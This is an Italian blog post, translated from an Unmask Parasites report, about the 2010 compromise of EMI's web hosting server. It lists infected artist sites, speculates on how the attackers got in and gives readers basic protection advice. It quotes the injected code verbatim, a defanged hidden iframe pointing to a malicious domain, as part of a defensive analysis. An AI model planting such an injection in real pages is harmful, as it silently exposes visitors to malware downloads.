Violato il server EMI

Il post seguente è stato tradotto per gentile concessione di Unmask Parasites .

EMI Music è una delle aziende leader della musica nel mondo, con molte etichette discografiche di successo e annovera artisti popolari quali Beatles, Depeche Mode, Gorillaz, Iron Maiden, Kylie Minogue, Pink Floyd, Queen, Snoop Dogg e molti altri. Hanno come hosting web EMIHosting.com, che fornisce spazio web per i siti di EMI e molti siti ufficiali degli artisti.

All’inizio di settembre EMI Hosting.com è stato attaccato da alcuni hacker. Più di un centinaio di siti web su un server con indirizzo IP 195 .225 .83 .57 sono stati infettati con un iframe dannoso. La pagina di diagnostica di Google per AS34401 (EMIMUSICGROUP) recita:

Tra i 279 siti testati in questa rete negli ultimi 90 giorni, 112, inclusi, ad esempio, richardhawleyforum.co.uk/, emirecords.co.uk/, emimusic.co.uk/; fornivano contenuti che permettevano di scaricare e installare software dannoso senza il consenso dell’utente.

Tra gli altri domini infetti possiamo notare (tutti i link puntano alle pagine di diagnostica di Google ) EMI Classics, Virgin Classics oltre a i siti ufficiali di Pink Floyd, David Gilmour, Gorillaz, Massive Attack, Coldplay, Brian Ferry.

La maggior parte sono già stati ripuliti e sbloccati da Google. Comunque alcuni siti rimangono nella blacklist ( i loro proprietari non hanno richiesto un’analisi del malware), ad esempio, i siti di Kate Bush e l’ album di Ray Charles “Genius loves company” .

Ancora infetti

Almeno15 siti che ho verificato contengono ancora iframe dannosi, in tutte le pagine o in alcune sezioni dei siti. Il 25 settembre 2010, i siti seguenti erano ancora pericolosi per la navigazione ( i link puntano ai report in tempo reale di Unmask Parasites ):

  1. Queen+Paul Rogers
  2. Queen Rock Montreal
  3. The Chemical Brothers
  4. Spice Girls Greatest Hits
  5. Nick Cave and the Bad Seeds
  6. The Kooks
  7. Starsailor
  8. The Good, The Bad And The Queen,
  9. Sonny J
  10. Jamie T
  11. Simon Webbe
  12. ebtg
  13. NowMusic Forums
  14. BuZzIn ‘ fLy RecOrDs
  15. EMI Classics UK

Codice dannoso

Tutti i siti infetti contengono questo iframe nascosto proveniente da “hxxp://virtuellvorun .org/zl/s2

 iframe nascosto di virtuellvorun nel report di Unmask Parasites

e tutte le pagine di diagnostica di Google riportano il dominio “virtuellvorun .org” come causa principale del problema.

L’ attuale codice HTML iniettato è:

<div style="visibility:hidden"><ifr ame src="hxxp://virtuellvorun .org/zl/s2" width=100 height=80></ifram e></div>

Può essere trovato in sezioni differenti nel codice delle pagine web.

Lo stesso attacco ha colpito TechCrunch?

Un’ informazione ancora più interessante è presente nella maggioranza dei siti web: il codice dannoso è stato individuato inizialmente il 5 e il 6 settembre . Questo, probabilmente, è il periodo in cui è avvenuto l’attacco. Secondo il servizio di Google Safe Browsing, lo stesso dominio “virtuellvorun .org” si è rivelato la fonte dell’infezione per i siti violati di TechCrunch (MobileCrunch, CrunchGear, TechCrunch Europe ) esattamente nello stesso periodo di tempo ( 6 settembre ).

Speculazioni sullo scenario di attacco

Ecco cosa penso potrebbe essere accaduto. Intorno al 5 settembre, gli hacker hanno utilizzato una falla di sicurezza in uno dei siti ospitati da EMI (molti di loro usano vecchie versioni di phpBB e WordPress) per caricare alcuni script backdoor e/o shell web.

Successivamente hanno usato gli script caricati per trovare siti con permessi sui file deboli e li hanno infettati. Poi gli amministratori di EMI hosting hanno rilevato la violazione e hanno cercato di ripulire i siti infetti. Purtroppo non hanno eseguito analisi a livello server e hanno omesso alcuni siti che contenevano injection pericolose.

Spero che questo articolo aiuterà EMI Hosting a trovare e ripulire i siti ancora infetti, che prendano in considerazione il rafforzamento dei loro server e raffinino le loro policy di sicurezza per impedire violazioni future a livello server; dopo tutto ospitano siti molto popolari e simili attacchi hacker espongono molti appassionati di musica al malware.

Ai navigatori

Come è possibile vedere, anche siti di notevoli dimensioni e con una grossa reputazione sono in grado di diffondere malware. Dovreste essere preparati al fatto che ogni sito web che visitate possa cercare di installare furtivamente qualcosa di dannoso sul computer. Per ridurre al minimo i rischi di infezione, il vostro sistema (sistema operativo, browser, i plugin, Flash, Java, Adobe Reader, ecc… ) dovrebbe essere sempre aggiornato con tutte le patch. Inoltre, vi suggerisco di usare NoScript su Firefox: questa estensione, altamente personalizzabile, blocca efficacemente qualsiasi contenuto che venga attivato da siti non attendibili; in questo caso particolare, il browser semplicemente ignorerà gli iframe dannosi.

Dite la vostra

Siete a conoscenza di alcuni dettagli in merito alle violazioni di EMI/TechCrunch? Cosa ne pensate? I vostri commenti sono i benvenuti.

Fonte: EMI Server Hacked

Written by admin

2 Comments

Gianni Amato

Penso che l’iframe injection sia ormai diventata una pratica piuttosto frequente ed è ovvio che ad esser presi di mira sono proprio i siti che fanno molti accessi. Se avessi un po’ di tempo in piu’ sarebbe interessante analizzare il caso.

admin

Sì…è pratica comune con siti importanti, però, quello che mi stupisce è che molti siti usassero versioni non aggiornate di Phpbb/Wordpress…Non credo ci voglia molta fatica a tener aggiornato un sito/blog…

Chi gestisce siti importanti credo non dovrebbe trascurare le basi più elementari della sicurezza: ormai pure un adolescente sa che un software va aggiornato 🙂 🙂

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Questo sito usa Akismet per ridurre lo spam. Scopri come i tuoi dati vengono elaborati.